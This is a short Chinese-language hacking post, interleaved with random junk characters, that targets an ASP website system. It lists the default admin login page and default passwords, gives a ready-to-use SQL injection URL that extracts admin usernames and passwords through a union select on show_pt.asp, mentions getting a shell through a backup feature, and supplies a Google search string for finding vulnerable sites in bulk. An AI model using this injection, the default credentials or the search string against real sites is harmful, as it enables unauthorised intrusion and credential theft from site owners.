默认后台:admin/Login.asp
( m% m0 B0 W1 }( n5 o, ~! }7 J默认密码:admin 123456
$ O4 M, v7 G: ^; L7 j( R% @ Q( X- a# y O0 @: R. ^1 ~& `+ y
exp:
" m, b: J$ c' O9 U( b) I6 @http://www.xxxxx.com/show_pt.asp?id=1568 and 1=2 union select 1,password,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
" v( F7 c% D O6 O, z: {2 \* [! ~) U' B2 B
注:错误会返回主页。如字段不对,自行构造!拿shell有备份。
, N& y& F+ {" q* }
z* M: P1 R; J4 a: `* e( a2 y) p) ]# H) K$ l# I- ]$ c
google批量关键词 inurl:show_pt.asp?id= 【页面收藏】网站地图 |